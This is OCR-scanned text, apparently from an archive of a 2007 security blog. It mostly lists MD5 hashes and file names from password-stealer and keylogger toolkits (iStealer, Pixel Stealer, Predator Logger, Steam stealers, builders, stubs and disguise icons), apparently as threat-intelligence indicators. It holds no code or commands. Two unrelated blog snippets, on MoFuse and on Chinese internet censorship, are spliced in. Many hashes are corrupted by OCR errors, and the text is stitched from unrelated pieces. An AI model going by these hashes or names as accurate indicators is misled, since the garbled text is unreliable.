b17f080d357c2052ac61a901dd64d296 
Icon11.ico 
4d6da825c79f9d2815276a470001edd9 
Icon12.ico 
6421d6ff10cO2bc3b9be2e87af5d9433 
Icon13.ico 
7545087733d829f96e217645988878ac 
Icon14.ico 
8227dbde5b5a0919742acce2e8ec55eb 
Icon15.ico 
58f4d18fb6b70cf14d4d94a6a345f7a2 
Icon16.ico 
6036713ff3b93596851ff000455456f5 
Icon17.ico 
f21e6c9752dbb791284a434b79b61d19 
Icon18.ico 
e157aed280d85d697773c4962dfb6a5d 
Thumbs.db 
f934d061e42d1bf0b5b4313f011880cb 
COMDLG32.0CX 
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3ec0a48ed8d8a019175cfa3952ccb3b7 
Register files.bat 
690e6f5112bc6f518f86bc06de6623d8 
Screenshot.png 
7428535ec134c439560cf902fb6cdc84 
bassmod.dll 
e4ec57e8508c5c4040383ebe6d367928 
iStealer.exe 
4d8c22253a41bbbbe086e16f5 7eafca6 
index.php 
dabfaf19f5eb79fdc23b606f12c25cf8 
style.css 
5ea854107536dc420ef2150b3537be86 
File Cloner.exe 
020b74780ffae3074b3d47342e6ccce5 
bassmod.dll 
e4ec57e8508c5c4040383ebe6d367928 
iloader.exe 
49f39ab7739189cc365f8770659a38ce 
iStealer 4.0.4.exe 
4ab4547c0967c0714e7bd82eef443e2f 
music.xm 1a3ec013628d62db7d25eb808c0cc94b 
COMDLG32.0CX 
3ec0a48ed8d8a019175cfa3952ccb3b7 
Register files.bat 
690e6f5112bc6f518f86bc06de6623d8 
Postbuild.exe 
5414eee5d90eda526f3a06729d3d0ea0 
bassmod.dll 
e4ec57e8508c5c4040383ebe6d367928 
iStealer 6.3 Legends.exe 
3e6dde21e8d59ecd96ebb077a5b4ae3d 
license.dat 
817331e736cb3c4d9f8b20c884c1la4cb 
Icon01.ico 
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2f2429ebec0cb515de572daa21af36be 
Icon02.ico 
111bd394a2570cdaclb6b7e511laace25 
Icon03.ico 
311705112206b60b4fac05a03bdeafcd 
Icon04.ico 
d8271455f17d850cd10343724f838e3c 
Icon05.ico 
8d63492512d853bb217d7d33e655b01d 
Icon06.ico 
476a3b82a1f9f1e603a50ebd0f6c2364 
Icon07.ico 
03f55bc3fc8e0399418dleccaa3cd5ed 
Icon08.ico 
3d757c45346c992ce7947438f3024d21 
Icon09.ico 
7¢€14e49f28343fd6ea383fe21lebd6e55 
Icon10.ico 
b17f080d357c2052ac61a901dd64d296 
Icon11.ico 
4d6da825c79f9d2815276a470001edd9 
Icon12.ico 
6421d6ff10c0O2bc3b9be2e87af5d9433 
Icon13.ico 
7545087733d829f96e217645988878ac 
Icon14.ico 
8227dbde5b5a0919742acce2e8ec55eb 
Icon15.ico 
58f4d18fb6b70cf14d4d94a6a345f7a2 
Icon16.ico 
6036713ff3b93596851ff000455456f5 
Icon17.ico 
f21e6c9752dbb791284a434b79b61d19 
Icon18.ico 
e157aed280d85d697773c4962dfb6a5d 
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Thumbs.db 
e4c3a7c9c63625f5080bdd8077045bc1 
index.php 
Oabd57e5df95f3ab335aa45c54b14455 
style.css 
5ea854107536dc420ef2150b3537be86 
SCLabel.ocx 
649bd837a3739460ade06c99aac4bc38 
Skin.skf 8bfc40d34ca8fdc3c5f2856ead6281e7 
SkinCrafter3 _vs2005.dll 
b5acb37197211dc215907499bc105745 
Lab Stelaer.exe 
55355f79184fbfedf882113e462cdd0a 
mail.php eeaf0272be62d944b66039b3df6b8b5c 
Screenshot.png 
462a98589ac85be93ef4279e98be0668 
upx.exe 
bf1b3a4559e250e0fad9d7c138020982 
stub.exe 4247422a7769674e32dca7abeb3c68bb 
Screenshot.jpg 
5b5d7d2afc75c4c91f1l0b3efa091da2c 
Multi Password Stealer 1.6.exe 
9376ff245530b550fc2bf324d25eeee9 
Screenshot.png 
4f278e7aeb401abc62e74f34cal84f2e 
Papst Stealer.NET.exe 
b4d975243ebadb6694c9d9bf4e4a783F 
Screenshot.jpg 
65910d1a11ff8eb3728b52ca678e9190 
PassStealer.3.0.exe 
lableb0025acbd15e8938ef7d7806eed 
Tut _PassStealer.3.0.txt 
a91011af59d35a4723c06b93d8ea4883 
Passwort.txt 


0317e564a785b0dbc18c5c8169ba2764 
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% Average Joe Blogger ~ average Joe Blogger 


Average Joe Blogger 


1 Notify Unconfirmed Subscribers 
Plugin 

2 Weekend Reading October 7 
2007 

3 Average Joe Blogger Upgraded to 
WharelPrese 7S 


Before After 


"MoFuse is short for Mobile Fusion. MoFuse was founded in July of 2007 and released it’s first 
private beta in late September of 2007. MoFuse allows content publishers to create RSS driven 


mobile sites and gives our users the ability to control almost every aspect of the design using 
some of our AJAX features." 


Enjoy! 


http: //ddanchev. blogspot .com/2007/02/talkrization-of-my-blog.htm 
ttp://talkr.com/app/cast_pods.app?feed_id=31762 


http: //m.mofuse.com/danche 
http: //mofuse.com/ 
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1. 
2. 
3. http: //ddanchev. blogspot .com/2006/10/ms-dewey-on-microsoft-and-security.htm 
4. 
5. 


Pesca Stealer 0.2.exe 
O88d8bfleaf7a5ef772ced61880fa70e 
Screenshot.jpg 
9853936ed90eldfa7/cf33858aa98c432 
Screenshot.jpg 
2f26262b2bd9798bbb5f3789f04f46cd 
pixel Stealer.exe 
65918481e9581fd5eb803abb6c741c5d 
stub.dat ee€151540b381e41220c5d7fb711ed03d 
Config.pixel 

pixel Stealer.exe 
b1d9aaa91df62b008a6a64bba9502d59 
Screenshot.jpg 
b85d243f0dd931b829b2e7535cd15fed 
avast pro.ico 
79f5bb9bbf7b3cea8c3b76046a2541c3 
avg.ico 
f40ac218d63695efbc76fec8bd0be3cb 
Battle field 2.ico 
ad328fad87758e2080b5a7c74b31f653 
bitcomet torrent file.ico 
1f7bbf03c61498ccaaefb2622333814f 
bitcomet.ico 
80ed336f155c24a264121d3a54c029f7 
cheat engine.ico 
66641cd06a9af34e3060f1c22e3a9894 
cs2 1.ico 
02bce25ca6cb48778b2596531031bfb4 
cs2 psd.ico 
c51lbceabf226f880865alda4cbaf28e7 
cs2 tiff.ico 
7ad293d7d0f184b7587198684b9335ce 
cs2.iCO 
d162c35e4dcdb4102c8eldbd36642778 
doc2003.ico 
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833317c2de3c4b321cc5b482db56787b 
dos.ico 
151c5730902bf607e5e17c5131789a3a 
filezilla.ico 
66bc1f3fefa332a1f573630d6743a165 
firefox shortcut.ico 
9acec600da444163f922cd6c70bd270c 
firefox.ico 
€3711374d820d9ee8468ee3642e5b284 
folder guard.ico 
bb331f5c4350a5a2070ad03eaa77fldd 
fraps.ico 
32931f87d6bbf0ae468c4351a5e6f210 
Google earth.ico 
f3balde98c557c416436d9dlaeef3b3b 
gta sa.ico 
509fefc5302aec5ealef9358d373f552 
help 1.ico 
6204f3e43eb080fdfecalc4d75492b09 
help 2.ico 
b7358be8ad588e6581b0723fdb157137 
IE Shortcut.ico 
e9f74aa61729315a5d00f2bf22163c79 
Internet Explorer.ico 
bb8ebc5032fccbcacccf67da07489d64 
limewire torrent file.ico 
5dee915e34dbfa5337951c40ab86cc97 
limewire.ico 
3d8a6706390a0678f4b9dd8c355el1fe6 
Media player 2.ico 
902dabc529fd4525cdale8312c7baelb 
Microsoft word 1.ico 
€0557f84d0965328e4b28f61d810fb1la 
Microsoft word.ico 


7d49cbaa8caad0e55c5d7al7a2ce4ce3 
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My Computer.ico 
e13fcOcda6fl1e8d3e09291f35d65784 
Notepad.ico 
8fb11f62d4e7cee8c2a416f363bd0246 
Recycle Bin full.ico 
Of7226ee8b3d00c007615e0a313282ae 
Reg Edit.ico 
d8c0936b80408f4791f2488d33deb7f9 
Reg editor.ico 
863d4a89146f2e600e8a9a49555b6810 
Setup1.ico 
76685dfa5860561a421b7acc5f5c37fb 
Setup2.ico 
58e4b64420f84efa71f0ce29cd50429e 
setup3.ico 
0544fd959b81b995e8cc6f49a97cdad9 
setup4.ico 
fd7e46db3b3d90605884db21dc772b84 
setup5.ico 
3c61061f7eff0f4b7ec40e69db3306cf 
spybot.ico 
156f00a8a376c2eddd562d81655f9063 
Thumbs.db 
cb27e02709a0d8b08ac1f05df5b40017 
uninstall.ico 
f3c494c5711292a08a3956402d11ab24 
unreal tourament.ico 
2311e7fcefoad497e731e3e6dbfb8664 
VB6 1.ico 
ad672dabdf13197fe44e4f6770a121e3 
VB6.ico 
bcO5afb5ff4ceba33d478ff49f7af788 
windows live messenger.ico 
ad04e50d2cdb6c9f2138e958d2d14bc2 


windows media player.ico 
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82af60ea9d04f8655e9091d257b57055 
winrar.ico 
076163d26929940be5176a82ae4c5d2d 
xfire.ico 
f7de5656389dd9151leeceb4bca7f2a72 
yahoo.ico 
95e4b14a7a08a394b80b1967c0891c4f 
COMDLG32.0CX 
d76f0eab36f83a31d411laeaf70da7396 
Config. pixel 

pixel Stealer.exe 
d2e5d26d1ed1383d2f7208c3a8a4df5b 
avast pro.ico 
79f5bb9bbf7b3cea8c3b76046a2541c3 
avg.ico 
f40ac218d63695efbc76fec8bd0be3cb 
Battle field 2.ico 
ad328fad87758e2080b5a7c74b31f653 
bitcomet torrent file.ico 
1f7bbf03c61498ccaaefb2622333814f 
bitcomet.ico 
80ed336f155c24a264121d3a54c029f7 
cheat engine.ico 
66641cd06a9af34e3060f1c22e3a9894 
cs2 1.ico 
02bce25ca6cb48778b2596531031bfb4 
cs2 psd.ico 
c5lbceabf226f880865alda4cbaf28e7 
cs2 tiff.ico 
7ad293d7d0f184b7587198684b9335ce 
cs2.ico 
d162c35e4dcdb4102c8eldbd36642778 
doc2003.ico 
833317c2de3c4b321cc5b482db56787b 
dos.ico 
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151c5730902bf607e5e17c5131789a3a 
filezilla.ico 
66bc1f3fefa332a1f573630d6743a165 
firefox shortcut.ico 
9acec600da444163f922cd6c70bd270c 
firefox.ico 
€3711374d820d9ee8468ee3642e5b284 
folder guard.ico 
bb331f5c4350a5a2070ad03eaa77fldd 
fraps.ico 
32931f87d6bbf0ae468c4351a5e6f210 
Google earth.ico 
f3balde98c557c416436d9d1laeef3b3b 
gta sa.ico 
509fefc5302aec5ealef9358d373f552 
help 1.ico 
6204f3e43eb080fdfecalc4d75492b09 
help 2.ico 
b7358be8ad588e6581b0723fdb157137 
IE Shortcut.ico 
e9f74aa61729315a5d00f2bf22163c79 
Internet Explorer.ico 
bb8ebc5032fccbcacccf67da07489d64 
limewire torrent file.ico 
5dee915e34dbfa5337951c40ab86cc97 
limewire.ico 
3d8a6706390a0678f4b9dd8c355el1fe6 
Media player 2.ico 
902dabc529fd4525cdale8312c7baelb 
Microsoft word 1.ico 
€0557f84d0965328e4b28f61d810fbla 
Microsoft word.ico 
7d49cbaa8caad0e55c5d7al7a2ce4ce3 
My Computer.ico 
e13fcOcda6fl1e8d3e09291f35d65784 
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Notepad.ico 
8fb11f62d4e7cee8c2a416f363bd0246 
Recycle Bin full.ico 
0f7226ee8b3d00c007615e0a313282ae 
Reg Edit.ico 
d8c0936b80408f4791f2488d33deb7f9 
Reg editor.ico 
863d4a89146f2e600e8a9a49555b6810 
Setup1.ico 
76685dfa5860561a421b7acc5f5c37fb 
Setup2.ico 
58e4b64420f84efa71f0ce29cd50429e 
setup3.ico 
0544fd959b81b995e8cc6f49a97cdad9 
setup4.ico 
fd7e46db3b3d90605884db21dc772b84 
setup5.ico 
3c61061f7eff0f4b7ec40e69db3306cf 
spybot.ico 
156f00a8a376c2eddd562d81655f9063 
Thumbs.db 
cb27e02709a0d8b08ac1f05df5b40017 
uninstall.ico 
f3c494c5711292a08a3956402d11ab24 
unreal tourament.ico 
2311e7fcefoad497e731e3e6dbfb8664 
VB6 1.ico 
ad672dabdf13197fe44e4f6770a121e3 
VB6.ico 
bcO5afb5ff4ceba33d478ff49f7af788 
windows live messenger.ico 
ad04e50d2cdb6c9f2138e958d2d14bc2 
windows media player.ico 
82af60ea9d04f8655e9091d257b57055 
winrar.ico 
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076163d26929940be5176a82ae4c5d2d 
xfire.ico 
f7de5656389dd9151leeceb4bca7f2a72 
yahoo.ico 
95e4b14a7a08a394b80b1967c0891c4f 
COMDLG32.0CX 
d76f0eab36f83a31d41laeaf70da7396 
Eazfuscator.NET.exe 
0b16a3c05246b76aa8f1414a55058ae8 
Eazfuscator.NET.exe.config 
27bc2e85b605b6428748d03e3379d2af 
PredPainV612.exe 
9e42ed7018b5b5ea79b3551e3d53926d 
AG.Configuration.SettingsProviders.dll 
3c53fc537d1facc55871c097645b1d20 
AG.Deployment.Updating.dll 
f5fd48397dfa32c3b797614b70263f33 
AG.Eazfuscator.NET.Settings.dll 
d46157cf559a598f35ea3b60b7dc10a9 
AG.Eazfuscator.NET.Updating.dll 
fa8707671464e6faad63591efdf37b99 
Eazfuscator.NET CEIP.exe 
fccf66134c23734c49f675970016e88f 
Eazfuscator.NET CEIP.exe.config 
€59a817454f452bbc6202823210177ff 
Eazfuscator.NET.Ceip.dll 
#29d37e5f75dd0953c2d40c13d872c5c 
Eazfuscator.NET.Ceip.dll.config 
8659c0040677e5871a6110cfc8278118 
Eazfuscator.NET.Installer.dll 
f7bfd33a6efde0059b26d453be489e36 
Eazfuscator.NET.Resources.dll 
7667393225276757254c14576f8a9cal 
ICSharpCode.SharpZipLib.dll 
8e12f571587af8fe6ccd000b93544296 
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lrony.dll 
cde81979717ca6a0945cda07d78841f7 
Microsoft.Cci.MetadataHelper.dll 
bbf6d32101630bed935f00606d3691b0 
Microsoft.Cci.MetadataModel.dll 
ceab894cc851c3214fa8c0577dac5bf5 
Microsoft.Cci.MutableMetadataModel.dll 
3855073220088a7a3436105bdc1c6966 
Microsoft.Cci.PeReader.dll 
d9de4c75554f40b3b6b7df4bb5858c91 
Microsoft.Cci.PeWriter.dll 
1b39ad88cfc6769f5158e52c1139d00b 
Microsoft.Cci.SourceModel.dll 
44da579041e3893f5fd8eb26b6dd8362 
Mono.Cecil.dll 
ea0cbe33dd675cee9a009565097e3a9c 
Mono.Cecil.Pdb.dll 
48a6e882927a46bbf41c8874e4b592b1 
Eazfuscator.NET.Hosting.x86.exe 
5c7551d9f16f94be02ae7 3be73ef6759 
Eazfuscator.NET.Hosting.x86.exe.config 
aef633b0018b8310607dacfa26d95191 
Eazfuscator.NET Updater.exe 
230d6ad35cd3b94b2d3f444fd6c101a2 
Logo Small.bmp 
b04decaafa088365ab96e6b452394ad0 
settings. ini 
debd441ed24d85f7ce855b2601e54e5b 
Predator Logger v5 Cracked.exe 
9676fe12c932c854c2f042bae276576c 
Screenshot.jpg 
0498db46b19721d5bcc59c9bd8c673a0 
ProStealer.exe 
36a764e19b6067f24e614363f89c8098 
SteamDecryptor.exe 
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5dbalae55db3dbel1bda91a7c2410c3e 
Screenshot.jpg 
69c4dd36f521830e357dedd226aaa3ba 
Builder.exe 
cd60cde9e56469822aa60dd472d79e97 


stub.exe 453060f9241fa2f9bbe114f9bcc82225 


Screenshot.jpg 
e7291ec54de268b63c4ac9ea57ab4f2a 
Pure-Steam.exe 
b085c8970868a45ea509cC934218d221b 


stub.exe 16f17b80db45fc305071a9cO0ccdb18c2 


Screenshot.jpg 
9ec09a2192f502e51cc8db80aa37ae4b 
builder.exe 
58fd3264f60ea684b70c36e85b907054 
COMDLG32.0CX 
ab412429fle5fb9708a8cdea07479099 
icon changer.exe 
C8142a814e7254a5e4celcfc66b0e8ae 
Steam ID Reader.exe 
€601f697c958630d11lab3c31dd5f55b2 
1 - 1100.ico 
b36966883d99812784e683d41a8fa085 
1 - 1101.ico 
7d0915622d2ca9af947f8bc94368cd6e 
1 - 195.ico 
25cf71d6f0838fffc393be1563aclb2c 

1 - 196.ico 
c354bcb8c9c825f7b57da58b8509b375 
1 - 197.ico 
0c1170b41ef2b38d6a497d6d89c6690d 
1 - 198.ico 
€4175bf5146294efdd3c064aa9cb9b47 
1 - 199.ico 
426d12efd0e39c7f1c6d30d919e0c66a 
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1.ico 

cb3932b32a98aa9fb72b67658f6ff8F2 

1125.ico df021d45cd6aa93b82184be8e02828b6 
1201.ico 44f3b955d6d54c46e57199166f71add6 
1203.ico 4becc5e96cbc1a88d9c85c37979eceab6 
1258.ico 7dc67cce361ca0770e4b4d55c51db02e 
1259.ico 2244d1720797973a910deel1d6e14fc82 
1279.ico 2753a8c8f3e11a006244185cf3b1a2a9 

1309.ico 8fc8d38d4eb0786668dcd33a97a53ea9 
133.ico 

da8e8566e1421eal16fa5663ab4cadad5 

1334.ico 8fc8d38d4eb0786668dcd33a97a53ea9 
1345.ico bd6a8c35bcf59b0ac699470f335185a7 

14.ico 

a4cfca474996b8a0370735b35b7b54d8 

1539.ico fed66d759ee9e6a8Fc566336b88ca426 

1659.ico 0c2710d59e3d9d2b903f1f67 1bfdf88d 

1660.ico 480b6fd191e3992590072e65a52d6516 
169.ico 

128eb34149128ac7dbc9cec3e452fc53 

1698.ico 54d7b75e48e51f26952a56aa85782c27 
1699.ico 67a61065fb7b8862aa96e8a123565cC9a 
1700.ico 8f7e8c3e3a07e365c60f8d6991ebb079 

1813.ico de84a48572ef166453ba41614a54c341 
1816.ico 4cab8068b8a082cbdab62be90c6dc8b96 
1845.ico 3f57d2c8aa4839e14dcb56903d0e0cf3 

1846.ico c3586f4f0825dde4c92a2d5503b7d367 
1851.ico 635a7d4acb7ac2a04af19bd732ffa5d8 

1865.ico b3625814403200511d3a69d207fe3e5a 
1900.ico e56ee9531141ebbf109bd388758a4fe7 
1901.ico 2d7f3e083a4f9d37343b65080630d845 
1902.ico be8060c840d678687271211536e450ed 
1911.ico fa4e9495d9144f1a15661f5facfddfdf 

2 - I7.ico 

foc9be6875b180f9712aa587cfeef2cf 
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3.10.11 A Journey to the Heart of Internet Censorship (2007-10-11 23:54) 
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greatfirewall 


Test any v 


Reporters Without Borders [1]just released their latest report on [2]China’s Internet Censorship 
practices, outlining how exactly bureaucracy intersects with technology, perhaps the worst 
combination | could think of : 


"The report also documents how the Beijing Internet Information Administrative Bureau 
has in practice asserted its daily editorial control over the leading news websites based in the 
nation’s Capital. It gives many examples of the actual instructions issued by officials in charge 
of this bureau. The last part of the report gives the results of a series of tests conducted with 
the mechanism of control through filtering keywords. These tests clearly show that, though 
there are still many disparities in the levels of censorship, the authorities have successfully 
coerced the online media into submission to censor themselves heavily on sensitive subjects." 


[3]Information is not free, but it just wants to be free and you cannot control the rules 
of curiosity and the basic right to know who’s what and what’s when - [4]Jeven if you shut 
down the Internet access inside the country. China’s Internet censorship is on the other 
hand a driving force for academic research across the globe. Even wondered what are the 
latest blocked keywords discovered filtered over time? Try the [5]list of blacklisted keywords 
discovered by ConceptDoppler, as of 19 Sep 2007, part of the [6]ConceptDoppler project - A 
Weather Tracker for Internet Censorship. 


Related posts: 
[7 ]Twisted Reality 
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2 - 18.ico 
e770de8b8ccc75eb2c61c65da6354de5 
2.iCO 
2e0fa257053572253e90dc30d293c91a 
205.ico 
5f9efdb4d55f7ae3be36cb260187ab9b 
206.ico 
ee7e3b9f1607c02aea71b7fcb8ef83ae 
214.ico 
61ea487fe59502b242491bf3610beeb5 
271.ico 
dc71593e47c360469bd4cfe0ada9b569 
292.iCcO 
53b56ca5b1b470817292fd7dleafcbc3 
293.iCcO 
614c99a51e4577356663e4bffbe42e26 
3.icO 
9a232640cebff63d12e1a0672abf8aa3 
311.ico 
38f2e0c0f1f4954b66aa44a80ac6965b 
495.ico 
c7e5d01894b59b7602313a15cb4c1b60 
5.ico 
8d9ef550e4dbb683f344277d7ad600de 
527.iCO 
d19a526496005dcf5816560afce8bd72 
6.iCcO 
e€313bb3cb55c22bfcf642bfdeac8710c 
6361129.ico 
2dd2713051a58519991a07d2aac1c875 
6361131.ico 
9d999020ba20a200150af312ae07e7a7 
6361137.ico 
030c624a7f2ebadc0e4cf47b8e5ef1f4 
6361138.ico 
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4209a12ef696d97535fff333e2c8d257 
6361139.ico 
c7d8f09c1f8479a0d06b7152ec60ebb0 
6361142.ico 
bf870824eb3aeff86de0256060c3499d 
6361143.ico 
fboc992a52597c967e21de309dfc58f82 
6361144.ico 
d2cacdda282674362ef0ea5067fd106b 
6361148.ico 
026bc829666de7750162d2aec9538bd7 
6361149.ico 
399cb94e5b3df53e1fb347af2795b46f 
6361217.ico 
1021902d67f014eb41c43591ba8f5bc6 
6361320.ico 
e2b113cbd38e3b2a29509375f98a4fae 
6361321.ico 
55ea2422e13daf0996139508254fdb14 
7.iCO 
58ba6bab6f20d7be/f2a788adcb0473c5 
81.ico 
a93665c5faad628a4f87ab61le9d1cff7b 
85.ico 
806ad9632db0bd87cbe41147c4dae336 
87.icO 
f018e551281cd5360bd1e83aaa28d942 
91.ico 
bb430629bcf50a95393flbabea863cce 
925.ico 
eec8ec781a8f1367d0f822976dfe9d11 
998.ico 
1a69352faa646830042829df89c2e2e3 
access.ico 


2805959bd71dc79f74c7b676ecbc76ab 
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Ad-aware.ico 
abf84f187a8e94f33f8e5c9ec55fab7e 
adobel.ico 
e28f77cC783850bc623f70d1f6fd613b3 
alien-icon.ico 
786907773006ad51cbacc56dd851f68f 
alligato.ico 
c5feadc9f9c202600121d6d3bab6e289b 
animal.ico 
Ob3b2df56966b3f4ef99c8c31bf2009F 
animall.ico 
7f9fbf82df528572b89bcdb1e244b81d 
animal2.ico 
22¢9c69626d28279b99d4fea225f322F 
animal3.ico 
€477919a7619f6222535c140831be3d8 
animal4.ico 
9be92b61ba3f095b8f0172a374bfab6f2 
animal5.ico 
219e329ac8526c5b842446al1fb4ef48f 
animal6.ico 
ee8b2f0alf3eb18b37e2b281501f3465 
animal7.ico 
44385f9d4784a9edf23fb9714aa24696 

ant.ico 

bf3e17daa0adac3908534d67 7f03d6a7 
ant2.ico de468510ef05ad4ff21477d25d40c022 
AOL1.ico 6ae7e3badcd06f8b4b794e17b8074d1d 
ape.ico 
2f12543725db06ae4bbaldable3a85e0 
ape2.ico 8d9c96af68ca9c6d99b759970cb6c1b4 
ape3.ico 68ae0852d7d7e4606c9f7e21fc0b1826 
Apple 2.ico 
d1f3cf443a53e7b69843340c8bcb52e0 


Apple.ico 
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ad74f6d9ce02a0ab36728394aaf7a3ae 
argentina.ico 
a3384cc2451fe7lac4e5ed804c62c10c 
astronaut.ico 
b7941b53daaeb3d68e51f80ed7f04591 
axe.ico 
59f36e6f2a1ba8995269df1559f07ecd 
babe.ico ff8bf5af74b6a4f72024d63da24cd085 
Babvil.ico 
€66988352f740d0addda4a9e3d6f5315 
Bavia.ico 
1934b2b6ad5cb0003a593dade706d3c1 
bear.ico b884c93c6c3ab17df1l066eb0715f5fdc 
bear01.ico 
b995f43a031d3555937ab70fefe351f1 
bear02.ico 
c75c0dc7a11587b25430efb731695142 
bear03.ico 
462f4e65fd456eedb04bf6715a706af3 
bear04.ico 
bb3elcf708b047d7f95e45c829d0e5f3 
bear06.ico 
e9d19262ee1b2abde38d88442603d6bd 
bear07.ico 
a4d2236b1a4f4ca70b0dcb97e6de5053 
bear08.ico 
88af521fe9fe2ae4fdeafe72be1b406a 
bear09.ico 
7f815e21f6fbef5dff9a78f5el4e7cac 
bear10.ico 
ab6d1cd6ca4068ea9f88e1c5f4654af5 
bear11.ico 
771eef0f257e1lbdelf65b46c1e3d1947 
bear12.ico 
6d685f4d3703a883951e601661599974 
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bear13.ico 
553b88130d3e6ec99b01554296elcel13 


bear14.ico 
539ffc8fdc81538ed983980ef9f99728 
bear15.ico 
ebf837ce4bf36f8b83af82e607964956 
bear16.ico 
d37019bc0a436100d8ac3cdfca70c7a8 
bear17.ico 
0259d44171ba106d120587flce285ecc 
bear18.ico 
68d77d40a984cb8afd5c9adab20f88f5 
bear19.ico 
055ecac8ef82323d3425075cb544e88c 
bear2.ico 
a473844b614f4e96e2359af4f9e148fa 
bear20.ico 
77906af3a51a5a81267028af49cd2cb0 
bear21.ico 
2f2150d05324d93d39abal6c34aba719 
bear22.ico 
bd5682338572545b6731e2c59316ff04 
bear23.ico 
799e84cb1a2a7053bb485808d2fc67f1 
bear24.ico 
1fa6ed3930c80b52e9d728f42b4a5728 
beaver.ico 
2f098c24f88143737cd2b19f6aaf351c 
bee.ico 


1bf41a4a40087ffca06c3845dc3d480c 
bee2.ico 004f46779b66ab96ad3af87d0c904d74 
bee3.ico 5e3f4f42e8c7c9ebalbfdafbcedf7473 
beetlel.ico 
d6eb92c056c70309c2eb9662d5a9311e 
beetle2.ico 
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378846dbe99a4f8d506c865c36cff8ed 
beetle3.ico 
6f312e738fd2f74b1b869c7d5ca4d629 
beverage-beer-glass.ico 
fade7db9fff026f8bf68df5696522a61 
beverage-beer-mug.ico 

a9 1cecf63568fd69808937b21ac38883 
beverage-corona.ico 
6dfef333b012cae8a86329e84d64de38 
beverage-hein.ico 
0373de653588a8b4f9965 72b9baeef84 
beverage-orange-cocktail.ico 
e3e196c05df3b466b8b599cceb42f63a 
beverage-red-cocktail.ico 
dfacd0d5451dca547c9c93e23e57cbde 
bigbill.ico 
a85374792e5c7b011e27b8aal1f5d57ec 
bio-icon.ico 
81433fdf8dee287eb2913b70f086a46a 
bird.ico 96b868dfe7291eb14af2c3b012afc6eb 
bird1.ico 
42d0c8a8fcfbbd0c3873dcdcd6635a50 
bird10.ico 
7a9f0e43726465983e251257f5218a30 
bird11.ico 
2e292ef5ccle8320a8feeafbef2fc4b1 
bird12.ico 
338bf719beed0eb6bfdfa367f969a28e8 
bird13.ico 
be8adfce85371e9cf407eea40dda6537 
bird2.ico 
bbdb1c9b690f5803d2a07blab6af4db0 
bird3.ico 
9719980538da52ec0ee18c7ee3b0a74c 
bird4.ico 
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8d3fcabbe7ec974715fc1f224030dd6b 
bird5.ico 
44a26db4364521c594b89001e3265e7c 
bird6.ico 
af77eeafec2a0537f8abd1d2c0a4a832 
bird7.ico 
alfc0c3de6041d31003f883996922c3c 
bird8.ico 
a7a790e2f9360a2d8f50c677997d0c3f 
bird9a.ico 
b459917a9348e2613ecb338celaca8fl 
bird9b.ico 
3d7b4a5cd81c5d6228c1d321f8e82d10 
birds.ico 
bdb839ee4d90fafa754de670a9c69893 
bison.ico 
df59e280fc58bfe6516eed3c238846b1 
biz10.ico 
b81671070587db59fa79768626493da4 
biz11.ico 
c7ae693ebda21013114fd6709f7ec24f 
biz12.ico 
€969b0681d229c47b51fclcc73cbf36b 
biz13.ico 
122fea9f3b80043cc3e3a2f93f167c0d 
biz14.ico 
9bd4e76356bded95304a985b136705ba 
biz15.ico 
73c031d10e64717d860518171b4fb75d 
biz16.ico 
e6ea32938d48d68bfb530d0777b7ee5a 
biz3.ico 7e3223d63e14808fe2c3242ec631856c 
biz4.ico 2e7cc628a419d7161337d31c7098c234 
biz5.ico f779a7f82782a3584e1220f832ba7839 
biz6.ico 8dbbaa6a747fdfa2461325025f4df79a 
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biz7.ico 30b2a38581bff4e3be051al1e17ca916 
biz8.ico d2608e08137f17e7f6383475f8613844 
biz9.ico a69439553d815174de320a0877cc5e31 
blacksh.ico 
14e2f76c9b157b92ec848b7143ddec32 
blank.ico 
117e05ec621abfb960da997926b739b1 
bluebird.ico 
7f88f4150fc8d0cfe5b4348a014dalb7 

boggled _circuit.ico 
b2d106d4250dd1a9e90d9353c10c2c27 
boot.ico 5e4fadc0b3e92a79655c2aa24d418f38 
boot2.ico 
9b4a6fef74477430bd5f646dc0e75da6 
boot3.ico 
e4e796ed3be6a8273d4db116e04e398d 
brazil.ico 

f4f6768fde7f5e34146f62d409dd3824 

bttrfly.ico 
1f3289110722bb713fa3e42dbacc7eea 
buffalo.ico 
lea85cd6eb8e7db7cf7234506113a0dc 

bug.ico 

b5b2b8c9aa692639a05fd5aad8cd63da 
bugl.ico 090c6db165df47c8fbdc4585290ce371 
bug10.ico 
285d95685a3cdf4a5f5b9e105053b729 
bug11.ico 
588ec5562dc4fa6ca43fcc5872129c26 
bug12.ico 
f98d4e252130e2f4492d820f63e4e243 
bug13.ico 
a665dcb62174f6f5d5cfboc5f8cd0534f 
bug14.ico 
924963b3ce54c7df05c95628c24a5b5e 
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bug15.ico 
€0160b7494496de374af37d183d86749 
bug16.ico 
c33bc734al16fb892e0faeacd28d964f0 
bug17.ico 
clbfe0f001b9a6468d2ceaad7bf14eb8 
bug18.ico 
8b813eb51bc9e467b0db1bd9ce33b6l1la 
bug19.ico 
2eabb8030a21891bb4ca8e8c4aca3d5f 
bug2.ico 466bc6601leceb2e9c9fc4c2ac50184a5 
bug20.ico 
f60c05b8be7c33f1a937b79eff113205 
bug21.ico 
fc7606e6d85ea7fca0044366c998eba2 
bug22.ico 
db73ca527fc80b52baac47e4a26d2388 
bug23.ico 
14cf3198d933af4ef90e6447b0045f78 
bug3.ico 222a4f27c19cacd65236fe5e39a96a90 
bug4.ico fe84fd65fd2f28a32cc46alf791ef35d 
bug5.ico f49d07a44abe2099cb46fc29e92bbe62 
bug7.ico f582a88f420606d269a3d9c2e53f3715 
bug8.ico f2beb9213d58be564b64111234c7e930 
bug9.ico b6867d32718396f32f551e09ee5f9596 
buglist.ico 
292b95bc345d78ec549e7560b16c6ce7 
bull.ico 06341d7bf7c25d1b9bdcb943a2b62d87 
bumblbee.ico 
e€63a7b8e51f684d97d5a6279e8d17541 
bunny.ico 
fac594b4d3d15da90459aa7730bd401b 
butfly.ico 
bbO09fd25bb855a6d9e5f15f06210ceeb 
butfly1.ico 
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e0eb839a80a3739dd847e82a64d9d99d 
butfly2.ico 

15ab582a1f986585 75ccd589bebele28 
butfly3.ico 
c8b9fc4fff940e7340d8b01af71b57a3 
butfly4.ico 
1152a6b088e125e56101f5503e47dcal 
butfly5.ico 
532b640866191a3de3e0cde34aldaafc 
butfly6.ico 
80bd4d8f7f0834522ab7cf779888b1dd 
butfly7.ico 
71d4577abc5a46b18a770076b95f2b7 
butterfl1.ico 
73b0d04b50765cc5d7e6dc98e8c82843 
butterf2.ico 
121f6804abfedc0202d434b85b185c2a 
butterf3.ico 
7d520aaedddbaca89e2be8b5710f50da 
